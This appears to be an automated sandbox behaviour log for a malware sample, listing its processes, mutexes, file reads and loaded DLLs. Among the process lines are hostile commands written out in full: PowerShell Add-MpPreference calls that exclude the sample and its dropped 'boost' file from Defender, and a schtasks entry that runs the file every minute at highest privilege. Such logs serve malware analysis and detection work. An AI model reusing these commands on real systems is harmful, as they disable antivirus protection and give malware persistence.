Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7196:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7952:120:WilError_03
Source: C:\Windows\System32\OpenWith.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5200:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6308:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7448:120:WilError_03
Source: C:\Windows\System32\OpenWith.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1272:120:WilError_03
Source: C:\Users\user\Desktop\aZDwfEKorn.exe | Mutant created: \Sessions\1\BaseNamedObjects\YS2JAyn2plZCUKxj
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7668:120:WilError_03
Source: C:\Users\user\Desktop\aZDwfEKorn.exe | File created: C:\Users\user\AppData\Local\Temp\Log.tmp
Source: aZDwfEKorn.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: aZDwfEKorn.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\aZDwfEKorn.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\aZDwfEKorn.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: aZDwfEKorn.exe | ReversingLabs: Detection: 81%
Source: C:\Users\user\Desktop\aZDwfEKorn.exe | File read: C:\Users\user\Desktop\aZDwfEKorn.exe
Source: unknown | Process created: C:\Users\user\Desktop\aZDwfEKorn.exe "C:\Users\user\Desktop\aZDwfEKorn.exe"
Source: C:\Users\user\Desktop\aZDwfEKorn.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\aZDwfEKorn.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\aZDwfEKorn.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'aZDwfEKorn.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\aZDwfEKorn.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\boost'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\aZDwfEKorn.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'boost'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "boost" /tr "C:\Users\user\AppData\Roaming\boost"
            Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\boost C:\Users\user\AppData\Roaming\boost
            Source: unknownProcess created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
            Source: unknownProcess created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\boost C:\Users\user\AppData\Roaming\boost
Source: C:\Users\user\Desktop\aZDwfEKorn.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\aZDwfEKorn.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\aZDwfEKorn.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\aZDwfEKorn.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\aZDwfEKorn.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\aZDwfEKorn.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\aZDwfEKorn.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\aZDwfEKorn.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\aZDwfEKorn.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\aZDwfEKorn.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\aZDwfEKorn.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\aZDwfEKorn.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\aZDwfEKorn.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\aZDwfEKorn.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\aZDwfEKorn.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\aZDwfEKorn.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\aZDwfEKorn.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\aZDwfEKorn.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\aZDwfEKorn.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\aZDwfEKorn.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\aZDwfEKorn.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\aZDwfEKorn.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\aZDwfEKorn.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\aZDwfEKorn.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\aZDwfEKorn.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\aZDwfEKorn.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\aZDwfEKorn.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\aZDwfEKorn.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\aZDwfEKorn.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\aZDwfEKorn.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\aZDwfEKorn.exe | Section loaded: sxs.dll
Source: C:\Users\user\Desktop\aZDwfEKorn.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\aZDwfEKorn.exe | Section loaded: scrrun.dll
Source: C:\Users\user\Desktop\aZDwfEKorn.exe | Section loaded: linkinfo.dll
Source: C:\Users\user\Desktop\aZDwfEKorn.exe | Section loaded: ntshrui.dll
Source: C:\Users\user\Desktop\aZDwfEKorn.exe | Section loaded: cscapi.dll
Source: C:\Users\user\Desktop\aZDwfEKorn.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\aZDwfEKorn.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\aZDwfEKorn.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\aZDwfEKorn.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\aZDwfEKorn.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\aZDwfEKorn.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\aZDwfEKorn.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\aZDwfEKorn.exe | Section loaded: avicap32.dll
Source: C:\Users\user\Desktop\aZDwfEKorn.exe | Section loaded: msvfw32.dll
Source: C:\Users\user\Desktop\aZDwfEKorn.exe | Section loaded: winmm.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Roaming\boost | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\boost | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\boost | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\boost | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\boost | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\boost | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\boost | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\boost | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\boost | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\boost | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\boost | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\boost | Section loaded: cryptbase.dll
Source: C:\Windows\System32\OpenWith.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\OpenWith.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\OpenWith.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\OpenWith.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\OpenWith.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\OpenWith.exe | Section loaded: twinui.dll
Source: C:\Windows\System32\OpenWith.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\OpenWith.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\OpenWith.exe | Section loaded: dwmapi.dll
Source: C:\Windows\System32\OpenWith.exe | Section loaded: pdh.dll
Source: C:\Windows\System32\OpenWith.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\OpenWith.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\OpenWith.exe | Section loaded: actxprxy.dll
Source: C:\Windows\System32\OpenWith.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\OpenWith.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\OpenWith.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\OpenWith.exe | Section loaded: windows.ui.appdefaults.dll
Source: C:\Windows\System32\OpenWith.exe | Section loaded: windows.ui.immersive.dll
Source: C:\Windows\System32\OpenWith.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\OpenWith.exe | Section loaded: uiautomationcore.dll
Source: C:\Windows\System32\OpenWith.exe | Section loaded: dui70.dll
Source: C:\Windows\System32\OpenWith.exe | Section loaded: duser.dll
Source: C:\Windows\System32\OpenWith.exe | Section loaded: dwrite.dll
Source: C:\Windows\System32\OpenWith.exe | Section loaded: bcp47mrm.dll
Source: C:\Windows\System32\OpenWith.exe | Section loaded: uianimation.dll
Source: C:\Windows\System32\OpenWith.exe | Section loaded: d3d11.dll
Source: C:\Windows\System32\OpenWith.exe | Section loaded: dxgi.dll
Source: C:\Windows\System32\OpenWith.exe | Section loaded: d3d10warp.dll
Source: C:\Windows\System32\OpenWith.exe | Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\OpenWith.exe | Section loaded: dxcore.dll
Source: C:\Windows\System32\OpenWith.exe | Section loaded: dcomp.dll
Source: C:\Windows\System32\OpenWith.exe | Section loaded: oleacc.dll
Source: C:\Windows\System32\OpenWith.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\OpenWith.exe | Section loaded: windows.ui.dll
Source: C:\Windows\System32\OpenWith.exe | Section loaded: windowmanagementapi.dll
Source: C:\Windows\System32\OpenWith.exe | Section loaded: textinputframework.dll
Source: C:\Windows\System32\OpenWith.exe | Section loaded: inputhost.dll
Source: C:\Windows\System32\OpenWith.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\OpenWith.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\OpenWith.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\OpenWith.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\OpenWith.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\OpenWith.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\OpenWith.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\OpenWith.exe | Section loaded: windowscodecs.dll
Source: C:\Windows\System32\OpenWith.exe | Section loaded: thumbcache.dll
Source: C:\Windows\System32\OpenWith.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\OpenWith.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\OpenWith.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\OpenWith.exe | Section loaded: directmanipulation.dll
Source: C:\Windows\System32\OpenWith.exe | Section loaded: textshaping.dll
            Source: C:\Windows\System32\svchost.exe | Sections loaded (78, in order): kernel.appcore.dll, qmgr.dll, bitsperf.dll, powrprof.dll, xmllite.dll, firewallapi.dll, esent.dll, umpdc.dll, dnsapi.dll, iphlpapi.dll, fwbase.dll, wldp.dll, ntmarta.dll, profapi.dll, flightsettings.dll, policymanager.dll, msvcp110_win.dll, netprofm.dll, npmproxy.dll, bitsigd.dll, upnp.dll, winhttp.dll, ssdpapi.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, appxdeploymentclient.dll, cryptbase.dll, wsmauto.dll, miutils.dll, wsmsvc.dll, dsrole.dll, pcwum.dll, mi.dll, userenv.dll, gpapi.dll, winhttp.dll, wkscli.dll, netutils.dll, sspicli.dll, ondemandconnroutehelper.dll, msv1_0.dll, ntlmshared.dll, cryptdll.dll, webio.dll, mswsock.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, rmclient.dll, usermgrcli.dll, execmodelclient.dll, propsys.dll, coremessaging.dll, twinapi.appcore.dll, onecorecommonproxystub.dll, execmodelproxy.dll, resourcepolicyclient.dll, vssapi.dll, vsstrace.dll, samcli.dll, samlib.dll, es.dll, bitsproxy.dll, ondemandconnroutehelper.dll, dhcpcsvc6.dll, dhcpcsvc.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, dpapi.dll, mpr.dll
